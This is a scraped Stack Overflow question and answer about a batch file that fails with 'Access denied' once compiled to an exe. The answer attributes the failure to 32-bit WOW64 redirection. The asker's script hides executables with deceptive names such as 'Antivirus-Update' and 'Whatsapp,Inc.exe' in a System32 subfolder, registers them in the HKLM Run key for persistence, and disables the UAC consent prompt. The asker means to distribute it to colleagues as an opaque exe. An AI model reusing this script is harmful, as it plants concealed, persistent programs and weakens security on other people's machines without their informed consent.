问题
This issue is eating my brains of. I have a simple batch file which makes a directory in %SYSTEMROOT% only if it does not exist & copies certain files to that directory, adds the attribute +S +R +H to them, adds two programs to startup via registry and disables UAC as I need it frequently like 3x day. It works well as a batch file but I want to distribute it to my fellow company mates. We all are having a competition in this so I do not need them to see my code; I know if I am still at the level of batch scripting than my code is not worth copying but my mates are also not the brightest bulbs!
My issue is that when I convert it to exe using Quick Batch Convertor as the moment it becomes an exe it starts giving Access denied error only when It gets to copy the files in %SYSTEMROOT% even though I am running it as administrator and the disabling UAC command, which is C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f works, which, originally should require admin privileges. Its only the the copying of files that give access denied when converted into exe. They all just work fine if it is in a form of batch.I know that this might be off topic but I suspect foul play on the batch file and not the Quick Batch Converter because I have converted many files using this converter an they worked flawless.
The code for my batch is here
@echo off
echo %CD%
cd %~dp0
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Update" /t REG_SZ /d "\"C:\Windows\System32\SystemSettingsUpdate\HL~Realtime~Defense.exe\" " /f
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Antivirus-Update " /t REG_SZ /d "\"C:\Windows\System32\SystemSettingsUpdate\Configure.exe\" " /f
if not exist "%SYSTEMROOT%\system32\SystemSettingsUpdate" mkdir %SYSTEMROOT%\system32\SystemSettingsUpdate
cd %~dp0
taskkill /f /im configure.exe
copy "%~dp0HL~Realtime~Defense.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
copy "%~dp0Whatsapp,Inc.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
copy "%~dp0Configure.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\Configure.exe
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\Whatsapp,Inc.exe
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\HL~Realtime~Defense.exe
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
exit
Any Suggestions?
回答1:
This answer does not resolve your problem; it's intended for explanation of strangely unusual behaviour of compiled script.
Described issue is not solvable with this 32-bit Quick Batch File Compiler. For proof, create a batch script battoexeTest.bat containing
@ECHO OFF
SETLOCAL EnableExtensions
set t|find /I "system"
for /F "delims=" %%G in ('
wmic process Where "caption='cmd.exe' and not CommandLine like '%%%%wmic%%%%'" get CommandLine^,ExecutablePath /value
') do for /F "delims=" %%g in ("%%~G") do echo(%%~g
pause
Output (elevated; note that I have redirected user's %temp% and %tmp% variables):
TEMP=D:\tempUser\SYSTEM
TMP=D:\tempUser\SYSTEM
CommandLine="C:\Windows\System32\cmd.exe" /C "D:\bat\battoexeTest.bat"
ExecutablePath=C:\Windows\System32\cmd.exe
If you run compiled version of above script batToExeTestY.exe elevated, output would change as follows:
TEMP=D:\tempUser\SYSTEM
TMP=D:\tempUser\SYSTEM
CommandLine=cmd.exe /c ""D:\tempUser\SYSTEM\8YQTO48H.bat" "D:\bat\batToExeTestY.exe" "
ExecutablePath=C:\Windows\SysWOW64\cmd.exe
You can see that
batToExeTestY.execreates a copy of original batch script with some random name8YQTO48H.batin temporary directory of accountSYSTEM, seeCommandLine;- runs that batch file in
32bitcommand line, seeExecutablePath. - hence, 32-bitness proved.
Read File System Redirector chapter in MSDN article Running 32-bit Applications:
The
%windir%\System32directory is reserved for 64-bit applications. … In most cases, whenever a 32-bit application attempts to access%windir%\System32, the access is redirected to%windir%\SysWOW64…
Example: run attrib under 64-bit command line prompt (C:\Windows\system32\cmd.exe) regardless of elevated or not:
==> attrib "%SYSTEMROOT%\sysWOW64\SystemSettingsUpdate\*.*"
A R C:\Windows\sysWOW64\SystemSettingsUpdate\WOW-cliParser.exe
A C:\Windows\sysWOW64\SystemSettingsUpdate\WOW-HL~Realtime~Defense.txt
==> attrib "%SYSTEMROOT%\system32\SystemSettingsUpdate\*.*"
A C:\Windows\system32\SystemSettingsUpdate\cliParser.exe
A SHR C:\Windows\system32\SystemSettingsUpdate\HL~Real~Def.txt
If you run attrib or dir under 32-bit command line prompt, then WOW redirector
- displays
C:\Windows\system32\SystemSettingsUpdatefile directory although - shows files located in
%SYSTEMROOT%\sysWOW64\SystemSettingsUpdateone.
Take a look:
==> %windir%\SysWoW64\cmd.exe /C attrib "%SYSTEMROOT%\system32\SystemSettingsUpdate\*.*"
A R C:\Windows\system32\SystemSettingsUpdate\WOW-cliParser.exe
A C:\Windows\system32\SystemSettingsUpdate\WOW-HL~Realtime~Defense.txt
==> %windir%\SysWoW64\cmd.exe /C dir /A "%SYSTEMROOT%\system32\SystemSettingsUpdate\*.*"|find ":"
Directory of C:\Windows\system32\SystemSettingsUpdate
01.03.2016 12:25 <DIR> .
01.03.2016 12:25 <DIR> ..
01.03.2015 12:31 5 120 WOW-cliParser.exe
26.02.2016 08:54 84 WOW-HL~Realtime~Defense.txt
Moreover, trying to run your batch script (slightly adapted for testing purposes and then compiled) elevated but AVG Internet Security Ultimate complains in its Resident Shield:
"Trojan horse Pakes_c.BWYN, d:\bat\batToExeTest.exe";"Secured";"25. 2. 2016, 22:50:52";"File or Directory";"c:\Program Files (x86)\Abyssmedia\Quick Batch File Compiler\quickbfc.exe"
and on copy "%~dp0XYZ.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate" line and/or on attrib lines in its Identity Protection module:
"IDP.ALEXA.51, D:\tempUser\SYSTEM\8W88ULA2.bat";"Secured";"26. 2. 2016, 8:35:14";"File or Directory";""
"Unknown, D:\tempUser\SYSTEM\0G8KOWPT.bat";"Secured";"26. 2. 2016, 1:08:25";"File or Directory";""
Could be a false positive, but you definitely need to use some virus-free and 64-bit-compliant bat to exe converter…
来源:https://stackoverflow.com/questions/35635431/having-troubles-with-batch-files